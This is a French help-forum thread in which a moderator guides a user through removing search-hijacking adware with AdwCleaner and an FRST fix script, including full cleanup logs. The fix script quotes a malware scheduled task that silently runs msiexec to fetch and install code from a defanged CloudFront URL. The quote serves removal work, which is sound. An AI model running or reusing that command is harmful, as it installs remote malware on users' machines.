Initialsite123 / mystarting123 comment enlever ?

Résolu/Fermé
MERCERENTON Messages postés 22 Date d'inscription lundi 11 février 2013 Statut Membre Dernière intervention 22 août 2019 - 1 juin 2017 à 17:10
Malekal_morte- Messages postés 180304 Date d'inscription mercredi 17 mai 2006 Statut Modérateur, Contributeur sécurité Dernière intervention 15 décembre 2020 - 2 juin 2017 à 22:48
Bonjour,
J'ai depuis aujourd'hui initialsite123 comme moteur de recherche et qui viens d'évoluer en mystarting123, je peut plus changer le moteur de recherche, google chrome ne répond plus aléatoirement entre 1min et 15min d'utilisation à peu près, j'ai cherché sur internet comment enlever cette merde mais je comprend pas. J'ai déja désinstaller initialsite123 dans panneau configuration rubrique programme mais ca n'a rien changer. Et puis comme un con j'ai réinitialiser google chrome du coup j'ai plus adblock donc c'est encore plus pourri qu'avant là. Me faut une solution rapidement svp.
Je remercie d'avance ceux qui m'aideront.


A voir également:

4 réponses

Malekal_morte- Messages postés 180304 Date d'inscription mercredi 17 mai 2006 Statut Modérateur, Contributeur sécurité Dernière intervention 15 décembre 2020 24 628
1 juin 2017 à 17:13
Salut

Commence par un nettoyage Adwcleaner en suivant les instructions du tutoriel : https://www.malekal.com/adwcleaner-supprimer-virus-adwares-pup/
Donne le rapport de nettoyage en reponse.

Puis

Suis le tutoriel FRST https://www.malekal.com/tutoriel-farbar-recovery-scan-tool-frst/
(et bien prendre le temps de lire afin d'appliquer correctement - tout y est expliqué).
Télécharge et lance le scan FRST, cela va générer trois rapports FRST :
  • FRST.txt
  • Shortcut.txt
  • Additionnal.txt


Envoie, comme expliqué, ces trois rapports sur le site http://pjjoint.malekal.com et en retour donne les trois liens pjjoint qui mènent à  ses rapports ici dans une nouvelle réponse afin que l'on puisse les consulter.

--
0
MERCERENTON Messages postés 22 Date d'inscription lundi 11 février 2013 Statut Membre Dernière intervention 22 août 2019 1
1 juin 2017 à 18:20
Merci pour ta réponse je vais essayer de faire ce que tu ma dis mais c'est très compliquer avec google qui ne répond plus, une page de pub qui s'ouvre à chaque clic etc...
0
Malekal_morte- Messages postés 180304 Date d'inscription mercredi 17 mai 2006 Statut Modérateur, Contributeur sécurité Dernière intervention 15 décembre 2020 24 628
1 juin 2017 à 18:21
Vas y avec Edge ou un autre navigateur WEB.
0
MERCERENTON Messages postés 22 Date d'inscription lundi 11 février 2013 Statut Membre Dernière intervention 22 août 2019 1 > Malekal_morte- Messages postés 180304 Date d'inscription mercredi 17 mai 2006 Statut Modérateur, Contributeur sécurité Dernière intervention 15 décembre 2020
1 juin 2017 à 18:57
J'ai fais le truc avec adwcleaner mais du coup maintenant google crash au bout de qques secondes. Ca ram a mort j'allais t'envoyer le premier rapport mais ca vient de crash. J'ai pas d'autres navigateur web, j'ai essayer de telecharger mozilla mais ca m'emmene sur des sites qui me demande de payer enfin voila c'est la merde mais je vais y arriver.
0
Malekal_morte- Messages postés 180304 Date d'inscription mercredi 17 mai 2006 Statut Modérateur, Contributeur sécurité Dernière intervention 15 décembre 2020 24 628 > MERCERENTON Messages postés 22 Date d'inscription lundi 11 février 2013 Statut Membre Dernière intervention 22 août 2019
Modifié le 1 juin 2017 à 19:02
Tu as forcément un autre navigateur WEB, Internet Explorer ou Edge.

Touche Windows + R
tape iexplore.exe et OK.
0
MERCERENTON Messages postés 22 Date d'inscription lundi 11 février 2013 Statut Membre Dernière intervention 22 août 2019 1 > Malekal_morte- Messages postés 180304 Date d'inscription mercredi 17 mai 2006 Statut Modérateur, Contributeur sécurité Dernière intervention 15 décembre 2020
1 juin 2017 à 19:20
Je trouve pas alors j'ai cherché dans le teuc windows a droite et quand je tape internet explorer ou edge il m'envois sur dzs sites pour les telecharger et je suis sous windows 8.1
0
Malekal_morte- Messages postés 180304 Date d'inscription mercredi 17 mai 2006 Statut Modérateur, Contributeur sécurité Dernière intervention 15 décembre 2020 24 628 > MERCERENTON Messages postés 22 Date d'inscription lundi 11 février 2013 Statut Membre Dernière intervention 22 août 2019
1 juin 2017 à 19:51
Alors tu arrives à aller télécharger FRST ?
Sinon par clé USB.
0
MERCERENTON Messages postés 22 Date d'inscription lundi 11 février 2013 Statut Membre Dernière intervention 22 août 2019 1
1 juin 2017 à 19:58
Non j'y arrive pas j'ai jamais le temps sa crash avant, j'ai trouver bing et yahoo sinon mais ca reste google chrome donc ca marche plus je vais essayer de prendre mozilla sur une clef usb ( je t'ecris via mon telephone la)
0
MERCERENTON Messages postés 22 Date d'inscription lundi 11 février 2013 Statut Membre Dernière intervention 22 août 2019 1
1 juin 2017 à 20:08
C'est bon j'ai mozilla bon du coup reprenons, voici le premier rapport de nettoyage adwcleaner :

# AdwCleaner v6.047 - Rapport créé le 01/06/2017 à 18:32:33
# Mis à jour le 19/05/2017 par Malwarebytes
# Base de données : 2017-05-31.2 [Serveur]
# Système d'exploitation : Windows 8.1 (X64)
# Nom d'utilisateur : LucasM - LUCAS
# Exécuté depuis : C:\Users\LucasM\Downloads\adwcleaner_6.047.exe
# Mode: Nettoyage
# Support : https://www.malwarebytes.com/support/
          • [ Services ] *****


[-] Service supprimé: 1aa1bc4222497b80a46d15188cc61a71
[-] Service supprimé: db74caa44a38f73c44c34e517799664f
[-] Service supprimé: NetUtils2016
[-] Service supprimé: Nettrans
[-] Service supprimé: WinSAPSvc
[-] Service supprimé: EsgScanner
[-] Service supprimé: Lace514
[-] Service supprimé: OtherSearch
[-] Service supprimé: Voyasollam
[-] Service supprimé: pgt_svc
[-] Service supprimé: BIT
          • [ Dossiers ] *****


[-] Dossier supprimé: C:\ProgramData\55f6ff37
[-] Dossier supprimé: C:\Users\LucasM\AppData\Local\AppTrailers
[-] Dossier supprimé: C:\Users\LucasM\AppData\Local\AdvinstAnalytics
[-] Dossier supprimé: C:\Users\LucasM\AppData\Roaming\One System Care
[-] Dossier supprimé: C:\Users\LucasM\AppData\Roaming\System Healer
[-] Dossier supprimé: C:\Users\LucasM\AppData\Roaming\HDWallPaper
[-] Dossier supprimé: C:\Users\LucasM\AppData\Roaming\AppTrailers
[-] Dossier supprimé: C:\Users\LucasM\AppData\Roaming\WinSAPSvc
[-] Dossier supprimé: C:\Users\LucasM\AppData\Roaming\devnull
[-] Dossier supprimé: C:\Users\LucasM\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\AppTrailers
[-] Dossier supprimé: C:\Program Files\Enigma Software Group
[-] Dossier supprimé: C:\ProgramData\PrefsSecure
[#] Dossier supprimé au redémarrage: C:\ProgramData\Application Data\PrefsSecure
[-] Dossier supprimé: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\One System Care
[-] Dossier supprimé: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\System Healer
[-] Dossier supprimé: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ttwifi
[-] Dossier supprimé: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\HDWallPaper
[-] Dossier supprimé: C:\WINDOWS\SysWOW64\SSL
[-] Dossier supprimé: C:\ProgramData\BIT
          • [ Fichiers ] *****


[-] Fichier supprimé: C:\WINDOWS\SysNative\drivers\1aa1bc4222497b80a46d15188cc61a71.sys
[-] Fichier supprimé: C:\Users\LucasM\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\BigFarm.lnk
[-] Fichier supprimé: C:\Users\LucasM\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\big_bang_empire.lnk
[#] Fichier supprimé: C:\WINDOWS\SysNative\NetUtils2016.dll
[-] Fichier supprimé: C:\WINDOWS\SysNative\drivers\NetUtils2016.sys
[-] Fichier supprimé: C:\WINDOWS\SysNative\drivers\EsgScanner.sys
[-] Fichier supprimé: C:\WINDOWS\SysNative\drivers\LACE_WPF_X64.SYS
[#] Fichier supprimé: C:\WINDOWS\SysNative\drivers\Lace_wpf_x64.sys
[-] Fichier supprimé: C:\WINDOWS\SysWOW64\findit.xml
          • [ DLL ] *****
          • [ WMI ] *****
          • [ Raccourcis ] *****
          • [ Tâches planifiées ] *****


[-] Tâche supprimée: JJiah91yAL
[-] Tâche supprimée: {0E0D0847-0879-7E08-0E11-0C087805110F}
[-] Tâche supprimée: One System CarePeriod
[-] Tâche supprimée: One System Care Run Delay
[-] Tâche supprimée: One System Care Monitor
[-] Tâche supprimée: SystemHealer Monitor
[-] Tâche supprimée: SystemHealer Run Delay
[-] Tâche supprimée: System HealerStartUp
[-] Tâche supprimée: System HealerPeriod
[-] Tâche supprimée: System Healer Task
[-] Tâche supprimée: One System Care Task
[-] Tâche supprimée: ttwifi
[-] Tâche supprimée: SoftUpgrade
[-] Tâche supprimée: HDWallPaper
[-] Tâche supprimée: Milimili
          • [ Registre ] *****


[-] Clé supprimée: HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Application\winzipersvc
[-] Clé supprimée: [x64] HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\services\winzipersvc
[#] Clé supprimée au redémarrage: [x64] HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Application\winzipersvc
[-] Clé supprimée: HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Application\PicexaService
[#] Clé supprimée au redémarrage: [x64] HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Application\PicexaService
[-] Clé supprimée: HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Application\Application Hosting
[#] Clé supprimée au redémarrage: [x64] HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Application\Application Hosting
[-] Clé supprimée: HKU\.DEFAULT\Software\b`nl{y
[-] Clé supprimée: HKU\.DEFAULT\Software\jhtrsq
[-] Clé supprimée: HKU\S-1-5-21-3977351154-88957995-3286287323-1002\Software\Interstat
[-] Clé supprimée: HKU\S-1-5-21-3977351154-88957995-3286287323-1002\Software\One System Care
[-] Clé supprimée: HKU\S-1-5-21-3977351154-88957995-3286287323-1002\Software\System Healer
[-] Clé supprimée: HKU\S-1-5-21-3977351154-88957995-3286287323-1002\Software\WajIEnhance
[-] Clé supprimée: HKU\S-1-5-21-3977351154-88957995-3286287323-1002\Software\ttwifi
[-] Clé supprimée: HKU\S-1-5-21-3977351154-88957995-3286287323-1002\Software\MICROSOFT\wewewe
[-] Clé supprimée: HKU\S-1-5-21-3977351154-88957995-3286287323-1002\Software\mtVoyasollam
[-] Clé supprimée: HKU\S-1-5-21-3977351154-88957995-3286287323-1002\Software\SpeeDownloader
[-] Clé supprimée: HKU\S-1-5-21-3977351154-88957995-3286287323-1002\Software\AppDataLow\Software\AppTrailers
[#] Clé supprimée au redémarrage: HKU\S-1-5-18\Software\b`nl{y
[#] Clé supprimée au redémarrage: HKU\S-1-5-18\Software\jhtrsq
[#] Clé supprimée au redémarrage: HKCU\Software\Interstat
[#] Clé supprimée au redémarrage: HKCU\Software\One System Care
[#] Clé supprimée au redémarrage: HKCU\Software\System Healer
[#] Clé supprimée au redémarrage: HKCU\Software\WajIEnhance
[#] Clé supprimée au redémarrage: HKCU\Software\ttwifi
[#] Clé supprimée au redémarrage: HKCU\Software\MICROSOFT\wewewe
[#] Clé supprimée au redémarrage: HKCU\Software\mtVoyasollam
[#] Clé supprimée au redémarrage: HKCU\Software\SpeeDownloader
[#] Clé supprimée au redémarrage: HKCU\Software\AppDataLow\Software\AppTrailers
[-] Clé supprimée: HKLM\SOFTWARE\OtherSearch
[-] Clé supprimée: HKLM\SOFTWARE\ScreenShot
[-] Clé supprimée: HKLM\SOFTWARE\b`nl{y
[-] Clé supprimée: HKLM\SOFTWARE\jhtrsq
[-] Clé supprimée: HKLM\SOFTWARE\mtVoyasollam
[-] Clé supprimée: HKLM\SOFTWARE\{84416237-6490-494D-9AD6-4994DD978971}
[-] Clé supprimée: HKLM\SOFTWARE\Soci2Sear Browser Enhancer
[-] Clé supprimée: HKLM\SOFTWARE\initialsite123Software
[-] Clé supprimée: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\11598763487076930564
[#] Clé supprimée au redémarrage: [x64] HKCU\Software\Interstat
[#] Clé supprimée au redémarrage: [x64] HKCU\Software\One System Care
[#] Clé supprimée au redémarrage: [x64] HKCU\Software\System Healer
[#] Clé supprimée au redémarrage: [x64] HKCU\Software\WajIEnhance
[#] Clé supprimée au redémarrage: [x64] HKCU\Software\ttwifi
[#] Clé supprimée au redémarrage: [x64] HKCU\Software\MICROSOFT\wewewe
[#] Clé supprimée au redémarrage: [x64] HKCU\Software\mtVoyasollam
[#] Clé supprimée au redémarrage: [x64] HKCU\Software\SpeeDownloader
[#] Clé supprimée au redémarrage: [x64] HKCU\Software\AppDataLow\Software\AppTrailers
[-] Clé supprimée: [x64] HKLM\SOFTWARE\b`nl{y
[-] Clé supprimée: [x64] HKLM\SOFTWARE\HDWallpaper
[-] Clé supprimée: [x64] HKLM\SOFTWARE\jhtrsq
[-] Clé supprimée: [x64] HKLM\SOFTWARE\InterSect Alliance
[-] Clé supprimée: [x64] HKLM\SOFTWARE\Speedownloader0099
[-] Clé supprimée: [x64] HKLM\SOFTWARE\Soci2Sear Browser Enhancer
[-] Clé supprimée: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Searchy
[-] Clé supprimée: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{24F5E422-6A70-4FAA-8CAD-E23D5DC1DAE6}
[-] Clé supprimée: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{DD0688A5-FC8B-4E93-A485-CBF606A56D49}
[-] Donnée restaurée: HKU\S-1-5-21-3977351154-88957995-3286287323-1002\Software\Microsoft\Internet Explorer\Main [Start Page]
[-] Donnée restaurée: HKCU\Software\Microsoft\Internet Explorer\Main [Start Page]
[-] Donnée restaurée: [x64] HKCU\Software\Microsoft\Internet Explorer\Main [Start Page]
[-] Valeur supprimée: HKU\S-1-5-21-3977351154-88957995-3286287323-1002\Software\Microsoft\Internet Explorer\SearchScopes [DefaultScope]
[-] Clé supprimée: HKU\S-1-5-21-3977351154-88957995-3286287323-1002\Software\Microsoft\Internet Explorer\SearchScopes\{ielnksrch}
[-] Donnée restaurée: HKU\S-1-5-21-3977351154-88957995-3286287323-1002\Software\Microsoft\Internet Explorer\SearchScopes [DefaultScope] {0633EE93-D776-472f-A0FF-E1416B8B2E3A}
[-] Valeur supprimée: HKCU\Software\Microsoft\Internet Explorer\SearchScopes [DefaultScope]
[#] Clé supprimée au redémarrage: HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{ielnksrch}
[-] Donnée restaurée: HKCU\Software\Microsoft\Internet Explorer\SearchScopes [DefaultScope] {0633EE93-D776-472f-A0FF-E1416B8B2E3A}
[-] Valeur supprimée: HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes [DefaultScope]
[-] Clé supprimée: HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\ielnksrch
[-] Valeur supprimée: [x64] HKCU\Software\Microsoft\Internet Explorer\SearchScopes [DefaultScope]
[#] Clé supprimée au redémarrage: [x64] HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{ielnksrch}
[-] Donnée restaurée: [x64] HKCU\Software\Microsoft\Internet Explorer\SearchScopes [DefaultScope] {0633EE93-D776-472f-A0FF-E1416B8B2E3A}
[-] Donnée restaurée: HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{653C3712-94DB-48D7-A87D-F25BE1C2C1B3} [NameServer]
[-] Donnée restaurée: HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{E0F6B236-B546-4990-B4E6-88F89AB7EE99} [NameServer]
[-] Donnée restaurée: HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{E2474098-3824-4ACD-92DA-7997010F7BFA} [NameServer]
[-] Donnée restaurée: HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{FCDA0A51-B511-4254-BF80-C2C6FB46B7DC} [NameServer]
[-] Donnée restaurée: [x64] HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{653C3712-94DB-48D7-A87D-F25BE1C2C1B3} [NameServer]
[-] Donnée restaurée: [x64] HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{E0F6B236-B546-4990-B4E6-88F89AB7EE99} [NameServer]
[-] Donnée restaurée: [x64] HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{E2474098-3824-4ACD-92DA-7997010F7BFA} [NameServer]
[-] Donnée restaurée: [x64] HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{FCDA0A51-B511-4254-BF80-C2C6FB46B7DC} [NameServer]
[-] Clé supprimée: HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.com/initialsite123-com/
[#] Clé supprimée au redémarrage: [x64] HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.com/initialsite123-com/
[-] Valeur supprimée: HKU\S-1-5-21-3977351154-88957995-3286287323-1002\Software\Microsoft\Windows\CurrentVersion\Run [Interstat]
[#] Valeur supprimée au redémarrage: HKCU\Software\Microsoft\Windows\CurrentVersion\Run [Interstat]
[#] Valeur supprimée au redémarrage: [x64] HKCU\Software\Microsoft\Windows\CurrentVersion\Run [Interstat]
[-] Valeur supprimée: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run [gplyra]
[-] Valeur supprimée: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run [AppTrailers]
[#] Valeur supprimée au redémarrage: HKU\S-1-5-21-3977351154-88957995-3286287323-1002\Software\Microsoft\Windows\CurrentVersion\Run [InterStat]
[#] Valeur supprimée au redémarrage: HKCU\Software\Microsoft\Windows\CurrentVersion\Run [InterStat]
[#] Valeur supprimée au redémarrage: [x64] HKCU\Software\Microsoft\Windows\CurrentVersion\Run [InterStat]
[-] Valeur supprimée: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run [SpeeDownloader]
[#] Clé supprimée au redémarrage: HKLM\SOFTWARE\Microsoft\Internet Explorer\SEARCHSCOPES\IELNKSRCH
[-] Clé supprimée: HKLM\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CERTIFICATES\26D9E607FFF0C58C7844B47FF8B6E079E5A2220E
[#] Clé supprimée au redémarrage: HKCU\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{ielnksrch}
[#] Clé supprimée au redémarrage: HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\EVENTLOG\APPLICATION\Application Hosting
[#] Clé supprimée au redémarrage: HKLM\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\IELNKSRCH
[-] Clé supprimée: HKLM\SOFTWARE\CLASSES\APPID\56BF5154-0B48-4ADB-902A-6C8B12E270D9
[-] Valeur supprimée: HKEY_USERS\S-1-5-18\Environment [SNP]
[-] Valeur supprimée: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost [WinSAPSvc]
[-] Clé supprimée: HKLM\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\WinZipper
[-] Clé supprimée: HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SILENTPROCESSEXIT\Voyasollam.exe
[-] Valeur supprimée: HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER [ENABLESHELLEXECUTEHOOKS]
[-] Valeur supprimée: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost [BIT]
          • [ Navigateurs ] *****
0
MERCERENTON Messages postés 22 Date d'inscription lundi 11 février 2013 Statut Membre Dernière intervention 22 août 2019 1 > MERCERENTON Messages postés 22 Date d'inscription lundi 11 février 2013 Statut Membre Dernière intervention 22 août 2019
1 juin 2017 à 20:17
(Oublier la fin)


:: Clés "Tracing" supprimées
:: Paramètres Winsock réinitialisés


C:\AdwCleaner\AdwCleaner[C0].txt - [13361 octets] - [01/06/2017 18:32:33]
C:\AdwCleaner\AdwCleaner[S0].txt - [12917 octets] - [01/06/2017 18:30:45]

########## EOF - C:\AdwCleaner\AdwCleaner[C0].txt - [13511 octets] ##########
0
MERCERENTON Messages postés 22 Date d'inscription lundi 11 février 2013 Statut Membre Dernière intervention 22 août 2019 1
1 juin 2017 à 20:22
0
Malekal_morte- Messages postés 180304 Date d'inscription mercredi 17 mai 2006 Statut Modérateur, Contributeur sécurité Dernière intervention 15 décembre 2020 24 628
1 juin 2017 à 20:37
Voici la correction à effectuer avec FRST. Tu peux t'aider de cette note explicative avec des captures d'écran.

Ouvre le bloc-notes : Touche Windows + R,
Dans le champs "Exécuter", saisir notepad et OK.
Copie/Colle dedans ce qui suit :

CreateRestorePoint:
CloseProcesses:
HKLM-x32\...\Run: [FBTime] => C:\Users\LucasM\AppData\Roaming\FBTime\FBTime.exe su <===== ATTENTION
HKU\S-1-5-21-3977351154-88957995-3286287323-1002\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner64.exe [6482200 2014-09-26] (Piriform Ltd)
HKU\S-1-5-21-3977351154-88957995-3286287323-1002\...\Run: [Akamai NetSession Interface] => C:\Users\LucasM\AppData\Local\Akamai\netsession_win.exe [4490200 2017-01-03] (Akamai Technologies, Inc.)
HKU\S-1-5-21-3977351154-88957995-3286287323-1002\...\Run: [5jo01pkajbr] => C:\Users\LucasM\AppData\Roaming\roebk0qi4z0\flscwx4en1g.exe
HKU\S-1-5-21-3977351154-88957995-3286287323-1002\...\Run: [21kjqn1b0mx] => C:\Users\LucasM\AppData\Roaming\ppckn0ypu4b\jf14v3rg1kf.exe
HKU\S-1-5-21-3977351154-88957995-3286287323-1002\...\Run: [ESTKAMOG6XJ0B1W] => C:\Program Files\Z30AY9S5XS\QZJY6FQAK.exe
HKU\S-1-5-21-3977351154-88957995-3286287323-1002\...\Run: [D5WX2JMA5J57AZK] => C:\Program Files (x86)\ipcm5uxb3do\H0IDT.exe
HKU\S-1-5-21-3977351154-88957995-3286287323-1002\...\Run: [nyhomnejaxs] => C:\Users\LucasM\AppData\Roaming\lptkub4xq3t\oei51tpw000.exe
HKU\S-1-5-21-3977351154-88957995-3286287323-1002\...\Run: [3c42unpcabo] => C:\Users\LucasM\AppData\Roaming\cxytj42qk2p\pbunnr1kddq.exe
HKU\S-1-5-21-3977351154-88957995-3286287323-1002\...\Run: [OIQS5WGEOTBN46I] => C:\Program Files\OGF9J0UAUZ\OGF9J0UAU.exe
HKU\S-1-5-21-3977351154-88957995-3286287323-1002\...\Run: [SHG30ORDN2QUZMM] => C:\Program Files\TC9F6T9GWU\TC9F6T9GW.exe
HKU\S-1-5-21-3977351154-88957995-3286287323-1002\...\Run: [NORFDA46EO7PM7Y] => C:\Program Files\XWYHMZEMJI\XWYHMZEMJ.exe
HKLM\...\Providers\0u8ha2gg: C:\Program Files (x86)\Gerfety Renew\local64spl.dll
HKLM\...\Providers\Internet Provider: inetpp.dll
HKLM\...\Providers\LanMan Services: win32spl.dll
IFEO\GoogleUpdate.exe: [Debugger] 324095823984.exe
IFEO\GoogleUpdaterService.exe: [Debugger] 8736459873644.exe
ShellExecuteHooks: Pas de nom - {234628B4-4048-11E7-9F2C-64006A5CFC23} - C:\Users\LucasM\AppData\Roaming\Grerdaentlerveck\Thuvale.dll [144384 2017-05-31] ()
ShellExecuteHooks: Pas de nom - {D6C8E98A-41E2-11E7-8F95-64006A5CFC23} - C:\Users\LucasM\AppData\Roaming\Chugophwabory\Dhesyserberward.dll [144384 2017-06-01] ()
S2 glory; C:\Users\LucasM\AppData\Local\glory\glory.dll [909824 2017-06-01] (glory) [Fichier non signé] <==== ATTENTION
C:\Users\LucasM\AppData\Local\glory
R1 NetUtils2016; C:\WINDOWS\system32\drivers\NetUtils2016.sys [907160 2017-06-01] () <==== ATTENTION
2017-06-01 16:48 - 2017-06-01 16:50 - 00000000 _____ C:\WINDOWS\SysWOW64\2
2017-06-01 14:13 - 2017-06-01 16:59 - 00000000 ____D C:\Program Files (x86)\MIO
2017-06-01 14:13 - 2017-06-01 14:13 - 00000000 ____D C:\Users\LucasM\AppData\Local\glory
2017-06-01 14:13 - 2017-06-01 14:13 - 00000000 ____D C:\Stuvatybugtain
2017-06-01 14:13 - 2017-06-01 14:13 - 00000000 ____D C:\Program Files (x86)\Leqercult
2017-06-01 10:36 - 2017-06-01 10:36 - 00000000 ____D C:\Users\LucasM\AppData\Local\FBTime
2017-06-01 10:35 - 2017-06-01 20:04 - 00000000 ____D C:\Users\LucasM\AppData\Roaming\Mozilla
2017-06-01 10:35 - 2017-06-01 10:42 - 00000000 ____D C:\Users\LucasM\AppData\Roaming\FBTime
2017-06-01 10:35 - 2017-06-01 10:35 - 00000000 ____D C:\Users\LucasM\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\FBTime
2017-06-01 10:34 - 2017-06-01 10:34 - 07306240 _____ C:\Users\LucasM\AppData\Local\agent.dat
2017-06-01 10:34 - 2017-06-01 10:34 - 01897408 _____ C:\Users\LucasM\AppData\Local\Nimtax.tst
2017-06-01 10:34 - 2017-06-01 10:34 - 01895382 _____ C:\Users\LucasM\AppData\Local\RanString.bin
2017-06-01 10:34 - 2017-06-01 10:34 - 00278509 _____ C:\Users\LucasM\AppData\Local\Inch-Tom.bin
2017-06-01 10:34 - 2017-06-01 10:34 - 00126464 _____ C:\Users\LucasM\AppData\Local\noah.dat
2017-06-01 10:34 - 2017-06-01 10:34 - 00070800 _____ C:\Users\LucasM\AppData\Local\Config.xml
2017-06-01 10:34 - 2017-06-01 10:34 - 00018432 _____ C:\Users\LucasM\AppData\Local\Main.dat
2017-06-01 10:34 - 2017-06-01 10:34 - 00005568 _____ C:\Users\LucasM\AppData\Local\md.xml
2017-06-01 10:34 - 2017-06-01 10:34 - 00004030 _____ C:\WINDOWS\System32\Tasks\{AAD67D22-1D7D-CA89-AE6A-42365C8BCD0A}
2017-06-01 10:34 - 2017-06-01 10:34 - 00003730 _____ C:\WINDOWS\System32\Tasks\{DDECCD21-4679-971B-9027-447A8990FE6A}
2017-06-01 10:34 - 2017-06-01 10:32 - 03448832 _____ (TODO: <Company name>) C:\Users\LucasM\AppData\Local\Nimtax.exe
2017-06-01 10:33 - 2017-06-01 10:33 - 00006052 _____ C:\WINDOWS\System32\Tasks\Nogisphaniing Log
2017-06-01 10:33 - 2017-06-01 10:33 - 00000000 ____D C:\Users\LucasM\AppData\Roaming\Chugophwabory
2017-06-01 10:32 - 2017-06-01 10:33 - 00016176 _____ C:\Users\LucasM\AppData\Local\InstallationConfiguration.xml
2017-06-01 10:32 - 2017-06-01 10:32 - 00140800 _____ C:\Users\LucasM\AppData\Local\installer.dat
2017-06-01 10:32 - 2017-06-01 10:32 - 00016732 _____ C:\WINDOWS\System32\Tasks\Magix Photo Viewer
2017-05-31 22:16 - 2017-06-01 18:45 - 00624640 _____ C:\WINDOWS\system32\NetUtils2016.dll
2017-05-31 22:16 - 2017-06-01 18:32 - 00907160 _____ C:\WINDOWS\system32\Drivers\NetUtils2016.sys
2017-05-31 22:16 - 2017-05-31 22:16 - 00000000 ____D C:\WINDOWS\system32\sstmp
2017-05-31 22:13 - 2017-06-01 10:43 - 00000000 ____D C:\Users\LucasM\AppData\Roaming\Grerdaentlerveck
2017-05-31 22:13 - 2017-05-31 22:13 - 00006032 _____ C:\WINDOWS\System32\Tasks\Gerfety Renew
2017-05-31 22:13 - 2017-05-31 22:13 - 00000000 ____D C:\Users\LucasM\AppData\Local\CrashRpt
2017-05-31 22:12 - 2017-06-01 10:39 - 00000000 ____D C:\Users\LucasM\AppData\Local\Aniodegerch
Task: {9E19C524-DA8A-48D3-891A-BB10EE4273B9} - System32\Tasks\{AAD67D22-1D7D-CA89-AE6A-42365C8BCD0A} => C:\ProgramData\{9B2C9CAB-2C87-2B00-2FC6-7B1C75A64760}\9EF8CFF6-2953-785D-CD45-4DF1AEEA6C9D.exe <==== ATTENTION
C:\ProgramData\{9B2C9CAB-2C87-2B00-2FC6-7B1C75A64760}
Task: {60D74037-7833-4D43-9F3D-455B095D736B} - System32\Tasks\Gerfety Renew => C:\Program Files (x86)\Leqercult\yaupdcache.exe
C:\Program Files (x86)\Leqercult
Task: {01C6FEBC-A81F-407C-83F7-416726AE65E0} - \Milimili -> Pas de fichier <==== ATTENTION
Task: {0627C52C-199F-4FEE-80D7-48F372AB393A} - \{0E0D0847-0879-7E08-0E11-0C087805110F} -> Pas de fichier <==== ATTENTION
Task: {0D692ABE-8B68-42CB-9226-02EA9D437886} - \SystemHealer Monitor -> Pas de fichier <==== ATTENTION
Task: {0D8A891D-890C-4808-84D8-2F436AB14653} - System32\Tasks\Microsoft\Windows\Application Experience\AitAgent => aitagent.exe
Task: {1C18A594-4D90-415D-BDCB-9ABC41A31D10} - System32\Tasks\Nogisphaniing Log => C:\Program Files (x86)\Leqercult\yaupdcache.exe
Task: {20D541B8-A50D-4DB2-81EC-AFFFBEA1D8A4} - \SoftUpgrade -> Pas de fichier <==== ATTENTION
Task: {219C8F87-A49C-43C2-8760-D73393C325CC} - System32\Tasks\{D03806F4-A3A9-405F-82B0-D0A41CB49E3C} => pcalua.exe -a "C:\Program Files (x86)\TmNationsForever\TmForeverLauncher.exe" -d "C:\Program Files (x86)\TmNationsForever"
C:\Program Files (x86)\TmNationsForever\
Task: {28EA772C-5D12-4C04-A31C-FCAFCC5372DD} - System32\Tasks\Microsoft\Windows\DeviceSettings\Aterriward => msiexec.exe /i hxxp://D2bUH1bF1g584W.clOuDfroNt.net/mmtsk/occup.php?p=WDCXWD7500BPKT-22PK4T0_WD-WXE1A72H5913H5913&d=20170531 /q <==== ATTENTION
